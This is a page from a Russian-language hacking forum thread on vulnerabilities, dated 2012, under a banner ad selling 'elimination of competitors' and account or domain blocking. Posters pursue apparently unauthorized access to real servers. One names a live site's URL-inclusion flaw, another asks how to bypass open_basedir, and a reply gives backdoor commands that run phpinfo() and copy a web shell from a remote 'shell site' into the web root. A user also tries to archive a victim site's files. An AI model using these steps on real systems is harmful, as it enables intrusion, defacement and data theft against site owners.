УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Ваши вопросы по уязвимостям.

Страница 2144 из 2438

2144

Опции темы

Поиск в этой теме

Опции просмотра

#21431

14.10.2012, 03:53

mod_

Guest

Сообщений: n/a

Провел на форуме:
2855

Репутация: 0

Konqi

абсолютно прав.ссылка открывается в iframe.складывается такое ощущение что ты знаешь о каком сайте идет речь))

ладно попробую.только узнаю как это делается для начала

#21432

14.10.2012, 16:43

BigBear

Новичок

Регистрация: 04.12.2008

Сообщений: 11

Провел на форуме:
69033

Репутация: 8

Цитата:

Сообщение от mod_

mod_ said:
Konqi
абсолютно прав.ссылка открывается в iframe.складывается такое ощущение что ты знаешь о каком сайте идет речь))
ладно попробую.только узнаю как это делается для начала

Ну вот самый примитивный пример frame.

_ttp://www.prodisney.ru/index.php?page=http://rambler.ru

Это ну никак нельзя перепутать с RFI

#21433

15.10.2012, 06:18

kacergei

Новичок

Регистрация: 26.05.2007

Сообщений: 8

Провел на форуме:
23906

Репутация: -5

Как обойти open_basedir? сколько не пробывал не получается)

Код:

Code:
Server software: Apache/2.2.9 (FreeBSD) PHP/5.2.8 mod_ssl/2.2.9 OpenSSL/0.9.7e-p1
Loaded Apache modules: core, prefork, http_core, mod_so, mod_authn_file, mod_authz_host, mod_authz_user, mod_auth_basic, mod_include, mod_log_config, mod_logio, mod_env, mod_mime_magic, mod_expires, mod_headers, mod_setenvif, mod_ssl, mod_mime, mod_autoindex, mod_suexec, mod_cgi, mod_dir, mod_actions, mod_userdir, mod_alias, mod_rewrite, mod_php5, mod_rpaf-2, mod_ispmgr
Disabled PHP Functions: none
Open base dir: /home/lc/data:.
cURL support: enabled
Supported databases: MySql (5.0.67), MSSQL, PostgreSQL

Readable /etc/passwd: no
Readable /etc/shadow: no

Userful: gcc, cc, ld, make, php, perl, python, ruby, tar, gzip, bzip2, nc, locate, suidperl
Danger: ipfw
Downloaders: wget, fetch, lynx, curl, lwp-mirror

#21434

15.10.2012, 06:59

BigBear

Новичок

Регистрация: 04.12.2008

Сообщений: 11

Провел на форуме:
69033

Репутация: 8

Цитата:

Сообщение от kacergei

kacergei said:
Как обойти open_basedir? сколько не пробывал не получается)

Код:

Code:
Server software: Apache/2.2.9 (FreeBSD) PHP/5.2.8 mod_ssl/2.2.9 OpenSSL/0.9.7e-p1
Loaded Apache modules: core, prefork, http_core, mod_so, mod_authn_file, mod_authz_host, mod_authz_user, mod_auth_basic, mod_include, mod_log_config, mod_logio, mod_env, mod_mime_magic, mod_expires, mod_headers, mod_setenvif, mod_ssl, mod_mime, mod_autoindex, mod_suexec, mod_cgi, mod_dir, mod_actions, mod_userdir, mod_alias, mod_rewrite, mod_php5, mod_rpaf-2, mod_ispmgr
Disabled PHP Functions: none
Open base dir: /home/lc/data:.
cURL support: enabled
Supported databases: MySql (5.0.67), MSSQL, PostgreSQL

Readable /etc/passwd: no
Readable /etc/shadow: no

Userful: gcc, cc, ld, make, php, perl, python, ruby, tar, gzip, bzip2, nc, locate, suidperl
Danger: ipfw
Downloaders: wget, fetch, lynx, curl, lwp-mirror

Попробуй тут посмотреть

"Листинг директории за пределами open_basedir за счет разного ответа функций "linkinfo" и "realpath" на существующий и несуществующий файл."

#21435

15.10.2012, 07:37

kacergei

Новичок

Регистрация: 26.05.2007

Сообщений: 8

Провел на форуме:
23906

Репутация: -5

Цитата:

Сообщение от BigBear

BigBear said:
Попробуй
тут
посмотреть
"Листинг директории за пределами open_basedir за счет разного ответа функций "linkinfo" и "realpath" на существующий и несуществующий файл."

Да сработало, создал файл с

-------

P.S> OxoTnik спасибо, но уже сделал по другому))

#21436

15.10.2012, 07:47

OxoTnik

Guest

Сообщений: n/a

Провел на форуме:
290351

Репутация: 173

Цитата:

Сообщение от kacergei

kacergei said:
Да сработало, создал файл с
Но как теперь загрузить нормальный shell?

скрипт_где_бекдор.php?cmd=phpinfo() ; тут посмотри пути до скрипта

скрипт_где_бекдор.php?cmd=copy("htt p://сайт_с_шелом.com/shell.txt","путь_к_корню_скрипта/2.php");

#21437

15.10.2012, 08:11

Expl0ited

Guest

Сообщений: n/a

Провел на форуме:
262707

Репутация: 935

Цитата:

Сообщение от kacergei

kacergei said:
Да сработало, создал файл с

Цитата:

Сообщение от OxoTnik

OxoTnik said:
скрипт_где_бекдор.php?cmd=
phpinfo();
тут посмотри пути до скрипта
скрипт_где_бекдор.php?cmd=
copy("http://сайт_с_шелом.com/shell.txt","путь_к_корню_скрипта/2.php");

#21438

15.10.2012, 08:53

BigBear

Новичок

Регистрация: 04.12.2008

Сообщений: 11

Провел на форуме:
69033

Репутация: 8

[offtop]

последние 3 поста оставлю на память потомкам

Прошу остальных модераторов не удалять сие посты =)

[/offtop]

#21439

15.10.2012, 11:57

kacergei

Новичок

Регистрация: 26.05.2007

Сообщений: 8

Провел на форуме:
23906

Репутация: -5

Цитата:

Сообщение от BigBear

BigBear said:
[offtop]
последние 3 поста оставлю на память потомкам
Прошу остальных модераторов не удалять сие посты =)
[/offtop]

)) *Улыбнуло*

Возник еще вопрос, пытаюсь заархивировать получаю:

$ tar cjf /tmp/site.tar.bz2 /usr/local/psa/home/vhosts/site.ru/ 2>&1

/libexec/ld-elf.so.1: /usr/local/lib/liblzma.so.5: version XZ_5.0 required by /usr/lib/libarchive.so.5 not defined

Код:

Code:
Server software: Apache/2.0.63 (Unix) PHP/5.2.8
Loaded Apache modules: core, prefork, http_core, mod_so, mod_access, mod_auth, mod_auth_anon, mod_auth_dbm, mod_charset_lite, mod_include, mod_deflate, mod_log_config, mod_env, mod_mime_magic, mod_cern_meta, mod_expires, mod_headers, mod_usertrack, mod_unique_id, mod_setenvif, mod_mime, mod_status, mod_autoindex, mod_asis, mod_info, mod_cgi, mod_vhost_alias, mod_negotiation, mod_dir, mod_imap, mod_actions, mod_speling, mod_userdir, mod_alias, mod_rewrite, mod_suexec, mod_php5, mod_rpaf-2
Disabled PHP Functions: none
Safe mode exec dir: /nonexec
cURL support: enabled
Supported databases: MySql (4.1.25)

Readable /etc/passwd: yes [view]
Readable /etc/shadow: no

Userful: gcc, cc, ld, make, php, perl, python, ruby, tar, gzip, bzip2, nc, locate
Danger: clamd, ipfw, snort
Downloaders: wget, fetch, lynx, links, curl, lwp-mirror

#21440

15.10.2012, 12:15

BigBear

Новичок

Регистрация: 04.12.2008

Сообщений: 11

Провел на форуме:
69033

Репутация: 8

Проблема в том, что функция архивирования не найдена (не установлена)

Для решения проблемы тебе нужны права root для выполнения операций chroot и /etc/rc.d/ldconfig start

З.Ы. Могу ошибаться

Страница 2144 из 2438

2144

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился)	PEPSICOLA	Болталка	188	23.05.2010 10:05
Ваши любимые компьютерные игры	PEPSICOLA	Болталка	280	19.08.2009 00:01
Ваши телеги...	F-IFTY	Болталка	13	18.08.2009 18:22
Вопросы по Ipb 2.0	Voodoo_People	Уязвимости CMS / форумов	26	15.02.2005 22:57

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход